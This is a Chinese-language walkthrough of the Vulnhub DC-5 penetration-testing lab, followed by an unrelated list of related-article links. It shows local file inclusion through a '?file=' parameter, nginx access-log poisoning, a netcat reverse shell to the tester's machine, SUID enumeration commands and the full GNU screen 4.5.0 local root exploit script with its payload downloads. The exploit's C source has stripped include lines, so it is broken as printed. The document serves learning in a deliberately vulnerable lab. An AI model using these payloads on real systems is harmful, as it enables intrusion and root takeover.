Part 03
Part 03

Vulnhub DC-5

Description

DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

The plan was for DC-5 to kick it up a notch, so this might not be great for beginners, but should be ok for people with intermediate or better experience. Time will tell (as will feedback).

As far as I am aware, there is only one exploitable entry point to get in (there is no SSH either). This particular entry point may be quite hard to identify, but it is there. You need to look for something a little out of the ordinary (something that changes with a refresh of a page). This will hopefully provide some kind of idea as to what the vulnerability might involve.

And just for the record, there is no phpmailer exploit involved. :-)

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

红字意思为在刷新页面后会有些改变的地方出现,且最终目的是获取 root 权限

Vulnhub DC-5_第1张图片

 Vulnhub DC-5_第2张图片

111 端口

Vulnhub DC-5_第3张图片 80端口

Vulnhub DC-5_第4张图片

 Vulnhub DC-5_第5张图片

在 welcome 页面上的信息看起来是英文但是缺少字母导致内容不好看清,且根据提示反复刷新并没有看到有变化的地方

Vulnhub DC-5_第6张图片

Vulnhub DC-5_第7张图片

Vulnhub DC-5_第8张图片

上方 url 的显示内容是我之前填入的,而关于 url 猜测文件包含,而我想要获取 root 权限

 ?file=php://filter/read=convert.base64-encode/resource=index.php

Vulnhub DC-5_第9张图片

Vulnhub DC-5_第10张图片

 ?file=/etc/passwd

Vulnhub DC-5_第11张图片

而 shadow 文件依旧不能回显,但是知道 url 是

linux系统日志文件的默认路径是:/var/log

而 Nginx 服务器访问 nginx 的日志有两个,access.log 和 error.log

?file=/var/log/nginx/access.log

Vulnhub DC-5_第12张图片

Vulnhub DC-5_第13张图片

Vulnhub DC-5_第14张图片

 Vulnhub DC-5_第15张图片

?file=/var/log/nginx/access.log&cmd=nc -e /bin/bash 192.168.37.128 5555 

Vulnhub DC-5_第16张图片

获取交互式 shell 

python -c "import pty; pty.spawn('/bin/bash')"

Vulnhub DC-5_第17张图片

Vulnhub DC-5_第18张图片

 根目录

Vulnhub DC-5_第19张图片

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

Vulnhub DC-5_第20张图片

 Vulnhub DC-5_第21张图片

 Vulnhub DC-5_第22张图片

 Vulnhub DC-5_第23张图片

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."

①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①①
cat << EOF > /tmp/libhax.c

#include
#include
#include
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

EOF


gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c

②②②②②②②②②②②②②②②②②②②②②②②②②②②②②②​​​​​​​②②​​​​​​​②②②②②②②②
cat << EOF > /tmp/rootshell.c

#include
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

EOF


gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c

---------》》》
echo "[+] Now we create our /etc/ld.so.preload file..."

③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③③
cd /etc
umask 000                                                                                                 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"             # newline needed
 

echo "[+] Triggering..."


screen -ls                                                                               # screen itself is setuid, so... 
/tmp/rootshell                     

按照文件所说的操作

Vulnhub DC-5_第24张图片

执行完后删除 

rm -f /tmp/libhax.c

编写第一个文件 libhax.c 和第二个文件 rootshell.c

填入脚本内容

Vulnhub DC-5_第25张图片

执行后得到 rootshell 后删除

rm -f /tmp/rootshell.c

开启服务器

Vulnhub DC-5_第26张图片

下载两个文件

wget http://192.168.37.128/libhax.so
wget http://192.168.37.128/rootshell

Vulnhub DC-5_第27张图片

依照操作执行命令

Vulnhub DC-5_第28张图片

cd /etc


umask 000


screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"


screen -ls


cd /tmp


./rootshel

顺利提权

Vulnhub DC-5_第29张图片

查看当前工作目录仍是 tmp,顺利进入 root 文件夹

Vulnhub DC-5_第30张图片

 最后一步,查看 flag

Vulnhub DC-5_第31张图片

 

你可能感兴趣的:(p2p,sql,c#,DC靶机)

  • SQL注入之ORDER BY注入 是小七呀呀 sql数据库网络安全
    前言主要介绍本人在学习SQL注过程中遇到关于orderby这个字段的使用心得。一、ORDERBY是什么?orderby在mysql中就是用来对特定字段进行排序的,可以通过字段名进行指定,也可以通过数字1,2,3等进行指定,1就代表第一个字段,2就代表第二个字段,以此类推。因此,我我们就可以通过数字的方式,来判断查询的表格有几个字段,这样就避免了要知道表的字段名称的处境,为后续的sql注入打下基础。
  • python orm框架sqlalchemy_Python的ORM框架SQLAlchemy入门教程 weixin_39758041 pythonorm框架sqlalchemy
    SQLAlchemy的核心理念是,SQL数据库查询的数量级和特性关键于目标结合;而目标结合的抽象性又关键于表和行。一安裝SQLAlchemy编码以下:pipinstallsqlalchemy导进要是没有出错则安裝取得成功编码以下:importsqlalchemysqlalchemy.__version__‘0.9.1’二应用sqlalchemy对数据库操作1.界定元信息内容,关联到模块编码以下:(
  • 【Go基础】Go入门与实践资源帖 小超人冲鸭 golang开发语言后端
    看到好的持续更新……Go系统教程从语法讲起:李文周博客七天快速上手项目Go测试驱动开发博客孔令飞项目开发实战课程,孔令飞图文教程《Go语言高级编程》书籍Go算法刷题模板Go实战项目KV系统crawlab分布式爬虫平台seaweedfs分布式文件系统Cloudreve云盘系统gfast后台管理系统(基于GoFrame)alist多存储文件列表(基于Gin、React)Yearning开源SQL审核平
  • Python的ORM框架SQLAlchemy入门教程 searchwang
    SQLAlchemy是python操作数据库的一个库。能够进行orm映射,SQLAlchemy“采用简单的Python语言,为高效和高性能的数据库访问设计,实现了完整的企业级持久模型”SQLAlchemy的理念是,SQL数据库的量级和性能重要于对象集合;而对象集合的抽象又重要于表和行。一安装SQLAlchemy复制代码代码如下:pipinstallsqlalchemy导入如果没有报错则安装成功复制
  • 网络空间安全(36)数据库权限提升获取webshell思路总结 IT 青年 网安知识库网络空间安全
    一、获取数据库访问权限寻找漏洞:SQL注入:这是最常见的方法之一。攻击者通过SQL注入漏洞,可以在数据库执行任意SQL语句,从而获取数据库中的数据,甚至可能获取数据库的访问权限。配置文件泄露:有时,数据库的配置文件(如数据库连接字符串)可能会因为配置不当而泄露,攻击者可以利用这些信息直接连接到数据库。弱密码或默认密码:一些数据库管理员可能使用弱密码或默认密码,攻击者可以通过暴力破解或字典攻击的方式
  • 如何改进Mybatis的xml自定义sql abckingaa BeeORMDBmybatisBee数据库
    如何改进Mybatis的xml自定义sqlmybatis的用法:a)使用动态SQL最常见情景是根据条件包含where子句的一部分。比如:SELECT*FROMBLOGWHEREstate=‘ACTIVE’ANDtitlelike#{title}b)foreach动态SQL的另一个常见使用场景是对集合进行遍历(尤其是在构建IN条件语句的时候)。比如:SELECT*FROMPOSTP#{item}是不
  • 脚本一键式启动Nginx、Mysql、Redis 小白写代码hh nginxmysqlredis容器
    此脚本包含拉取镜像、数据卷挂载、容器启动三大部分,可一键式安装三大环境新建一个depoy.sh文件在服务器上,然后复制以下内容。给脚本文件添加执行权限chmod+xdepoy.sh#文件的当前目录下如果需要修改数据库MYSQL密码和Reids密码MYSQL_ROOT_PASSWORD="1459Hyh."requirepass1459Hyh.#!/bin/bash#1️⃣检查是否安装Docker&
  • STOPWATCH类 抗争到底zhy 前端
    在C#中,Stopwatch类属于System.Diagnostics命名空间,它的主要用途是精准测量代码块的执行时间。在性能分析、算法优化以及其他需要时间测量的场景里,这个类非常实用。下面为你详细介绍Stopwatch类。基本使用步骤1.引入命名空间usingSystem.Diagnostics;2.创建Stopwatch实例Stopwatchstopwatch=newStopwatch();3
  • C++语言的声明式编程 俞嫦曦 包罗万象golang开发语言后端
    C++语言的声明式编程引言声明式编程是一种编程范式,它强调描述程序的“要做什么”而不是“怎么做”。在传统的命令式编程中,程序员通常需要详细地指定操作步骤,而在声明式编程中,程序员则可以专注于结果的描述。这一编程风格在C++语言的使用中,虽然不如某些其他语言(如Haskell或SQL)那样突出,但依然通过一些特性和标准库提供了支持。本文将深入探讨C++中的声明式编程,包括其基本概念、与命令式编程的对
  • 【SoC基础】单片机之RCC模块 望闻问嵌 #SoC单片机
    :如果你也对机器人、人工智能感兴趣,看来我们志同道合✨:不妨浏览一下我的博客主页【https://blog.csdn.net/weixin_51244852】:文章若有幸对你有帮助,可点赞收藏⭐不迷路:内容若有错误,敬请留言指正!原创文,转载注明出处RCC模块简介RCC(ResetandClockControl)即复位和时钟控制模块,其基本功能总结如下:时钟源管理多源选择:支持多种时钟源,包含内部
  • 自动生成二维码(根据文本内容)——CAD c#二次开发 山水CAD筑梦人 CADC#二次开发c#数据库服务器
    用户输入文本内容,运行插件生成二维码(jpg图片格式),扫码即可显示文本内容。※※※也可根据excel文件内容批量一键生成上万个二维码。※※※效果如下:首先需要引用库usingZXing;部分代码如下:publicclass二维码{internalstaticListtempFiles=newList();privatestaticPoint3dcurrentInsertPoint=newPoin
  • SparkSQL编程-RDD、DataFrame、DataSet 早拾碗吧 Sparksparkhadoop大数据sparksql
    三者之间的关系在SparkSQL中Spark为我们提供了两个新的抽象,分别是DataFrame和DataSet。他们和RDD有什么区别呢?首先从版本的产生上来看:RDD(Spark1.0)—>Dataframe(Spark1.3)—>Dataset(Spark1.6)如果同样的数据都给到这三个数据结构,他们分别计算之后,都会给出相同的结果。不同是的他们的执行效率和执行方式。在后期的Spark版本中
  • qt读取数据库数据并验证_qt 数据库操作总结 NewbeeSmart qt读取数据库数据并验证
    qt数据库操作总结整理一下QT操作数据库的一些要点,以备以后的查询学习(主要是操作mysql)。首先,要查询相关的驱动是否已经装好了,可以用以下的程序进行验证:#include#include#include#includeintmain(intargc,char*argv[]){QCoreApplicationa(argc,argv);qDebug()
  • qt子线程读取读取数据库 skywalker818__ 数据库qt
    这里写自定义目录标题主要目的是为了记录自己踩过的坑。在子线程中读取数库内容时,按照在子线程中的run函数中创造数据的链接并查询,在第一次使用子线程的时候,可以正常运行,在重复使用的时候,则可能会报错:下面为子线程的run函数:```cppvoidrun(){QSqlDatabase*db=newQSqlDatabase(QSqlDatabase::addDatabase("QSQLITE"));Q
  • 使用OPTIMIZE TABLE优化MySQL表空间 sg_knight 数据库mysql数据库表空间优化碎片
    在MySQL数据库中,随着数据的不断增删改,表可能会产生碎片,导致表空间利用率下降,查询性能也会受到影响。为了解决这个问题,MySQL提供了OPTIMIZETABLE命令,它可以帮助我们重新组织表的物理存储结构,减少碎片,并可能回收未使用的空间。本文将详细介绍如何使用OPTIMIZETABLE来优化MySQL表空间。一、OPTIMIZETABLE的基本用法OPTIMIZETABLE命令的基本语法如
  • 在centos7里面安装 mysql5.6.44 SAFE20242034 #MySQL运维mysql
    一查询系统自带的mysqlroot@obdserver~]#rpm-qa|grepmysql二卸载系统自带的mysql因为没有mysql,所以也不用卸载三下载安装官方的yum源[root@obdserver~]#ll/etc/yum.repos.d/总用量40-rw-r--r--.1rootroot25233月1201:22CentOS-Base.repo-rw-r--r--.1rootroot1
  • 【数据库】MySQL备份与恢复策略:确保数据安全必备技能 千益 数据库数据库mysql
    在数据库管理中,数据是企业最宝贵的资产之一。无论是硬件故障、人为错误还是恶意攻击,数据丢失都可能对业务造成灾难性影响。因此,制定并实施有效的备份与恢复策略是确保数据安全的关键。本文将深入探讨MySQL备份与恢复的最佳实践,并通过丰富的实际案例帮助您理解如何在实际场景中应用这些策略。一、为什么需要备份与恢复策略?1.数据丢失的常见原因硬件故障:磁盘损坏、服务器宕机等。人为错误:误删数据、错误操作等。
  • MySQL 重复数据操作 一只小熊猫呀 #MySQLMySQL重复数据操作查询重复数据删除重复数据
    1、查询重复数据SELECTa.*FROMtable_aaINNERJOIN(SELECTid_customerFROMtable_aGROUPBYid_customerHAVINGCOUNT(*)>1)bONa.id_customer=b.id_customer;说明:子查询(子选择b)选择所有id_customer并计算每个id_customer的出现次数。通过HAVINGCOUNT(*)>1
  • 光伏储能直流系统MATLAB仿真(PV光伏阵列+Boost DCDC变换器+负载+双向DCDC变换器+锂离子电池系统) yyds_2201 matlab开发语言
    欢迎来到本博客❤️❤️博主优势:博客内容尽量做到思维缜密,逻辑清晰,为了方便读者。⛳️座右铭:行百里者,半于九十。本文目录如下:目录1概述光伏储能直流系统MATLAB仿真研究一、引言二、光伏储能直流系统的基本构成(一)PV光伏阵列(二)BoostDC/DC变换器(三)负载(四)双向DC/DC变换器(五)锂离子电池系统(六)控制模块(七)观测模块三、MATLAB仿真模型建立(一)光伏阵列模型(二)B
  • 破局 MySQL 死锁:深入理解锁机制与高效解决方案 小吕学编程 javamysql数据库sql
    死锁的原理1.什么是死锁?当多个事务在并发执行时,每个事务都持有其他事务需要的锁,同时又在等待对方释放锁,导致所有事务都无法继续执行的状态,称为死锁(Deadlock)。2.死锁的四个必要条件互斥条件:资源(如某行数据)一次只能被一个事务独占。请求与保持条件:事务在持有某些锁的同时,请求新的锁。不剥夺条件:事务已获得的锁不能被强制剥夺。循环等待条件:事务之间形成环形等待链,如事务A等待事务B,事务
  • How Spark Read Sftp Files from Hadoop SFTP FileSystem IT•轩辕 CloudyComputationsparkhadoop大数据
    GradleDependenciesimplementation('org.apache.spark:spark-sql_2.13:3.5.3'){excludegroup:"org.apache.logging.log4j",module:"log4j-slf4j2-impl"}implementation('org.apache.hadoop:hadoop-common:3.3.4'){exc
  • C#运算符与表达式详解 AitTech C#c#算法开发语言
    在C#编程中,运算符和表达式是构建复杂逻辑和处理数据的关键元素。以下是对C#运算符与表达式的详细解析:一、运算符运算符是一种特殊的符号,用于执行各种数学、逻辑和其他操作。C#中的运算符可以分为以下几类:算术运算符:+:加法运算符,用于将两个数值相加。-:减法运算符,用于将一个数值减去另一个数值。*:乘法运算符,用于将两个数值相乘。/:除法运算符,用于将一个数值除以另一个数值。%:取模运算符,用于获
  • pyspark 遇到**Py4JJavaError** Traceback (most recent call last) ~\AppData\ 2pi sparkpython
    Py4JJavaErrorTraceback(mostrecentcalllast)~\AppData\Local\Temp/ipykernel_22732/1401292359.pyin---->1feat_df.show(5,vertical=True)D:\Anaconda3\envs\recall-service-cp4\lib\site-packages\pyspark\sql\data
  • MySQL 安全传输 向阳1218 大数据doris
    Doris开启SSL功能需要配置CA密钥证书和Server端密钥证书,如需开启双向认证,还需生成Client端密钥证书:默认的CA密钥证书文件位于Doris/fe/mysql_ssl_default_certificate/ca_certificate.p12,默认密码为doris,您可以通过修改FE配置文件conf/fe.conf,添加mysql_ssl_default_ca_certifica
  • 在NET6项目中报错,未能在命名空间System.Data.SqlClient中找到类型名SqlCommand,解决办法 luckyext c#后端.netvisualstudioasp.netsql前端
    在NET6项目中报错,未能在命名空间System.Data.SqlClient中找到类型名SqlCommand问题:NET6项目编译时报错如下未能在命名空间“System.Data.SqlClient”中找到类型名“SqlCommand”。此类型已转发到程序集“System.Data.SqlClient,Version=0.0.0.0,Culture=neutral,PublicKeyToken=
  • Flink实践:通过Flink SQL进行SFTP文件的读写操作 kkk1622245 flinksql大数据
    在大数据处理领域,ApacheFlink出类拔萃,它是一个高性能、易扩展、用于处理有界和无界数据流的分布式处理引擎。FlinkSQL是ApacheFlink提供的一种声明式API,允许开发者以SQL的形式,轻松实现复杂的数据流和批处理分析。本文将重点探讨如何通过FlinkSQL来实现对SFTP文件的读写操作,这是在实际应用中经常遇到的一种场景。Flink与SFTP文件的读写在很多实际应用场景中,数
  • laravel如何通过DB获取一条数据的指定字段并转成数组 phpgolife phpphplaravel
    在Laravel中,如果你想要通过原生数据库查询构建器(DBfacade)获取一条数据的指定字段,并将其转换为数组,你可以这样做:首先,使用select方法来指定你想要获取的字段,然后使用where方法来添加查询条件,最后调用first()方法来获取结果集中的第一条记录。first()方法返回的是一个StdClass对象,你可以直接访问其属性来获取字段值,或者你可以使用toArray()方法将对象
  • laravel如何通过DB获取一条数据并转成数组 phpgolife phplaravelphp
    在Laravel中,你可以使用原生数据库查询构建器(DBfacade)来获取一条数据,并将其转换为数组。这可以通过在查询链的末尾调用first()方法后,使用toArray()方法来实现。first()方法会返回一个StdClass对象(如果找到数据的话),然后你可以调用toArray()方法将这个对象转换为数组。以下是一个示例,展示了如何通过DB门面获取一条数据并将其转换为数组:useIllum
  • 3.4 C#的运算符和表达式详解(运算符优先级、算术运算符、逻辑运算符……) Argonaut春 从零开始学cc#javaandroid运算符表达式
    文章目录C#的运算符和表达式3.4.1运算符与表达式类型1.算术运算符与算术表达式2.字符串运算符与字符串表达式3.关系运算符与关系表达式4.逻辑运算符与逻辑表达式5.条件运算符与条件表达式6.赋值运算符与赋值表达式3.4.2运算符的优先级与结合性1.运算符的优先级2.结合性示例代码C#的运算符和表达式运算符大致分为3类:一元运算符,包括前缀运算符和后缀运算符,用于处理一个操作数二元运算符,使用时
  • 【GreatSQL优化器-17】DYNAMIC RANGE 数据库mysql
    【GreatSQL优化器-17】DYNAMICRANGE一、DYNAMICRANGE介绍GreatSQL的优化器有一种扫描方式是动态范围扫描方式,类似于“已读乱回”模式,这种模式是在表有多个索引的情况下,对驱动表连接的时候部分选择索引的情况。优化器没有找到好的索引可以使用,但发现在知道前面表的列值后,可能会使用某些索引。对于前面表中的每个行组合,优化器检查是否可以使用range或indexmerg
  • Hadoop(一) 朱辉辉33 hadooplinux
    今天在诺基亚第一天开始培训大数据,因为之前没接触过Linux,所以这次一起学了,任务量还是蛮大的。 首先下载安装了Xshell软件,然后公司给了账号密码连接上了河南郑州那边的服务器,接下来开始按照给的资料学习,全英文的,头也不讲解,说锻炼我们的学习能力,然后就开始跌跌撞撞的自学。这里写部分已经运行成功的代码吧.    在hdfs下,运行hadoop fs -mkdir /u
  • maven An error occurred while filtering resources blackproof maven报错
    转:http://stackoverflow.com/questions/18145774/eclipse-an-error-occurred-while-filtering-resources   maven报错: maven An error occurred while filtering resources   Maven -> Update Proje
  • jdk常用故障排查命令 daysinsun jvm
    linux下常见定位命令: 1、jps      输出Java进程       -q       只输出进程ID的名称,省略主类的名称;       -m      输出进程启动时传递给main函数的参数;     &nb
  • java 位移运算与乘法运算 周凡杨 java位移运算乘法
      对于 JAVA 编程中,适当的采用位移运算,会减少代码的运行时间,提高项目的运行效率。这个可以从一道面试题说起:     问题: 用最有效率的方法算出2 乘以8 等於几?” 答案:2 << 3 由此就引发了我的思考,为什么位移运算会比乘法运算更快呢?其实简单的想想,计算机的内存是用由 0 和 1 组成的二
  • java中的枚举(enmu) g21121 java
    从jdk1.5开始,java增加了enum(枚举)这个类型,但是大家在平时运用中还是比较少用到枚举的,而且很多人和我一样对枚举一知半解,下面就跟大家一起学习下enmu枚举。先看一个最简单的枚举类型,一个返回类型的枚举: public enum ResultType { /** * 成功 */ SUCCESS, /** * 失败 */ FAIL,
  • MQ初级学习 510888780 activemq
    1.下载ActiveMQ 去官方网站下载:http://activemq.apache.org/ 2.运行ActiveMQ 解压缩apache-activemq-5.9.0-bin.zip到C盘,然后双击apache-activemq-5.9.0-\bin\activemq-admin.bat运行ActiveMQ程序。 启动ActiveMQ以后,登陆:http://localhos
  • Spring_Transactional_Propagation 布衣凌宇 springtransactional
    //事务传播属性 @Transactional(propagation=Propagation.REQUIRED)//如果有事务,那么加入事务,没有的话新创建一个 @Transactional(propagation=Propagation.NOT_SUPPORTED)//这个方法不开启事务 @Transactional(propagation=Propagation.REQUIREDS_N
  • 我的spring学习笔记12-idref与ref的区别 aijuans spring
    idref用来将容器内其他bean的id传给<constructor-arg>/<property>元素,同时提供错误验证功能。例如: <bean id ="theTargetBean" class="..." /> <bean id ="theClientBean" class=&quo
  • Jqplot之折线图 antlove jsjqueryWebtimeseriesjqplot
    timeseriesChart.html <script type="text/javascript" src="jslib/jquery.min.js"></script> <script type="text/javascript" src="jslib/excanvas.min.js&
  • JDBC中事务处理应用 百合不是茶 javaJDBC编程事务控制语句
      解释事务的概念; 事务控制是sql语句中的核心之一;事务控制的作用就是保证数据的正常执行与异常之后可以恢复   事务常用命令:             Commit提交         
  • [转]ConcurrentHashMap Collections.synchronizedMap和Hashtable讨论 bijian1013 java多线程线程安全HashMap
    在Java类库中出现的第一个关联的集合类是Hashtable,它是JDK1.0的一部分。 Hashtable提供了一种易于使用的、线程安全的、关联的map功能,这当然也是方便的。然而,线程安全性是凭代价换来的――Hashtable的所有方法都是同步的。此时,无竞争的同步会导致可观的性能代价。Hashtable的后继者HashMap是作为JDK1.2中的集合框架的一部分出现的,它通过提供一个不同步的
  • ng-if与ng-show、ng-hide指令的区别和注意事项 bijian1013 JavaScriptAngularJS
            angularJS中的ng-show、ng-hide、ng-if指令都可以用来控制dom元素的显示或隐藏。ng-show和ng-hide根据所给表达式的值来显示或隐藏HTML元素。当赋值给ng-show指令的值为false时元素会被隐藏,值为true时元素会显示。ng-hide功能类似,使用方式相反。元素的显示或
  • 【持久化框架MyBatis3七】MyBatis3定义typeHandler bit1129 TypeHandler
    什么是typeHandler? typeHandler用于将某个类型的数据映射到表的某一列上,以完成MyBatis列跟某个属性的映射   内置typeHandler MyBatis内置了很多typeHandler,这写typeHandler通过org.apache.ibatis.type.TypeHandlerRegistry进行注册,比如对于日期型数据的typeHandler,
  • 上传下载文件rz,sz命令 bitcarter linux命令rz
    刚开始使用rz上传和sz下载命令: 因为我们是通过secureCRT终端工具进行使用的所以会有上传下载这样的需求: 我遇到的问题: sz下载A文件10M左右,没有问题 但是将这个文件A再传到另一天服务器上时就出现传不上去,甚至出现乱码,死掉现象,具体问题 解决方法: 上传命令改为;rz -ybe 下载命令改为:sz -be filename 如果还是有问题: 那就是文
  • 通过ngx-lua来统计nginx上的虚拟主机性能数据 ronin47 ngx-lua 统计 解禁ip
    介绍 以前我们为nginx做统计,都是通过对日志的分析来完成.比较麻烦,现在基于ngx_lua插件,开发了实时统计站点状态的脚本,解放生产力.项目主页: https://github.com/skyeydemon/ngx-lua-stats 功能 支持分不同虚拟主机统计, 同一个虚拟主机下可以分不同的location统计. 可以统计与query-times request-time
  • java-68-把数组排成最小的数。一个正整数数组,将它们连接起来排成一个数,输出能排出的所有数字中最小的。例如输入数组{32, 321},则输出32132 bylijinnan java
    import java.util.Arrays; import java.util.Comparator; public class MinNumFromIntArray { /** * Q68输入一个正整数数组,将它们连接起来排成一个数,输出能排出的所有数字中最小的一个。 * 例如输入数组{32, 321},则输出这两个能排成的最小数字32132。请给出解决问题
  • Oracle基本操作 ccii Oracle SQL总结Oracle SQL语法Oracle基本操作Oracle SQL
    一、表操作 1. 常用数据类型 NUMBER(p,s):可变长度的数字。p表示整数加小数的最大位数,s为最大小数位数。支持最大精度为38位 NVARCHAR2(size):变长字符串,最大长度为4000字节(以字符数为单位) VARCHAR2(size):变长字符串,最大长度为4000字节(以字节数为单位) CHAR(size):定长字符串,最大长度为2000字节,最小为1字节,默认
  • [强人工智能]实现强人工智能的路线图 comsci 人工智能
        1:创建一个用于记录拓扑网络连接的矩阵数据表      2:自动构造或者人工复制一个包含10万个连接(1000*1000)的流程图      3:将这个流程图导入到矩阵数据表中      4:在矩阵的每个有意义的节点中嵌入一段简单的
  • 给Tomcat,Apache配置gzip压缩(HTTP压缩)功能 cwqcwqmax9 apache
    背景: HTTP 压缩可以大大提高浏览网站的速度,它的原理是,在客户端请求网页后,从服务器端将网页文件压缩,再下载到客户端,由客户端的浏览器负责解压缩并浏览。相对于普通的浏览过程HTML ,CSS,Javascript , Text ,它可以节省40%左右的流量。更为重要的是,它可以对动态生成的,包括CGI、PHP , JSP , ASP , Servlet,SHTML等输出的网页也能进行压缩,
  • SpringMVC and Struts2 dashuaifu struts2springMVC
    SpringMVC VS Struts2 1: spring3开发效率高于struts 2: spring3 mvc可以认为已经100%零配置 3: struts2是类级别的拦截, 一个类对应一个request上下文, springmvc是方法级别的拦截,一个方法对应一个request上下文,而方法同时又跟一个url对应 所以说从架构本身上 spring3 mvc就容易实现r
  • windows常用命令行命令 dcj3sjt126com windowscmdcommand
    在windows系统中,点击开始-运行,可以直接输入命令行,快速打开一些原本需要多次点击图标才能打开的界面,如常用的输入cmd打开dos命令行,输入taskmgr打开任务管理器。此处列出了网上搜集到的一些常用命令。winver 检查windows版本 wmimgmt.msc 打开windows管理体系结构(wmi) wupdmgr windows更新程序 wscrip
  • 再看知名应用背后的第三方开源项目 dcj3sjt126com ios
    知名应用程序的设计和技术一直都是开发者需要学习的,同样这些应用所使用的开源框架也是不可忽视的一部分。此前《 iOS第三方开源库的吐槽和备忘》中作者ibireme列举了国内多款知名应用所使用的开源框架,并对其中一些框架进行了分析,同样国外开发者 @iOSCowboy也在博客中给我们列出了国外多款知名应用使用的开源框架。另外txx's blog中详细介绍了 Facebook Paper使用的第三
  • Objective-c单例模式的正确写法 jsntghf 单例iosiPhone
    一般情况下,可能我们写的单例模式是这样的: #import <Foundation/Foundation.h> @interface Downloader : NSObject + (instancetype)sharedDownloader; @end #import "Downloader.h" @implementation
  • jquery easyui datagrid 加载成功,选中某一行 hae jqueryeasyuidatagrid数据加载
    1.首先你需要设置datagrid的onLoadSuccess $( '#dg' ).datagrid({onLoadSuccess :  function (data){      $( '#dg' ).datagrid( 'selectRow' ,3); }});   2.onL
  • jQuery用户数字打分评价效果 ini JavaScripthtmljqueryWebcss
    效果体验:http://hovertree.com/texiao/jquery/5.htmHTML文件代码: <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>jQuery用户数字打分评分代码 - HoverTree</
  • mybatis的paramType kerryg DAOsql
    MyBatis传多个参数: 1、采用#{0},#{1}获得参数:    Dao层函数方法:     public User selectUser(String name,String area); 对应的Mapper.xml    <select id="selectUser" result
  • centos 7安装mysql5.5 MrLee23 centos
    首先centos7 已经不支持mysql,因为收费了你懂得,所以内部集成了mariadb,而安装mysql的话会和mariadb的文件冲突,所以需要先卸载掉mariadb,以下为卸载mariadb,安装mysql的步骤。   #列出所有被安装的rpm package rpm -qa | grep mariadb   #卸载 rpm -e mariadb-libs-5.
  • 利用thrift来实现消息群发 qifeifei thrift
               Thrift项目一般用来做内部项目接偶用的,还有能跨不同语言的功能,非常方便,一般前端系统和后台server线上都是3个节点,然后前端通过获取client来访问后台server,那么如果是多太server,就是有一个负载均衡的方法,然后最后访问其中一个节点。那么换个思路,能不能发送给所有节点的server呢,如果能就
  • 实现一个sizeof获取Java对象大小 teasp javaHotSpot内存对象大小sizeof
       由于Java的设计者不想让程序员管理和了解内存的使用,我们想要知道一个对象在内存中的大小变得比较困难了。本文提供了可以获取对象的大小的方法,但是由于各个虚拟机在内存使用上可能存在不同,因此该方法不能在各虚拟机上都适用,而是仅在hotspot 32位虚拟机上,或者其它内存管理方式与hotspot 32位虚拟机相同的虚拟机上 适用。     
  • SVN错误及处理 xiangqian0505 SVN提交文件时服务器强行关闭
    在SVN服务控制台打开资源库“SVN无法读取current” ---摘自网络 写道 SVN无法读取current修复方法 Can't read file : End of file found 文件:repository/db/txn_current、repository/db/current   其中current记录当前最新版本号,txn_current记录版本库中版本
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他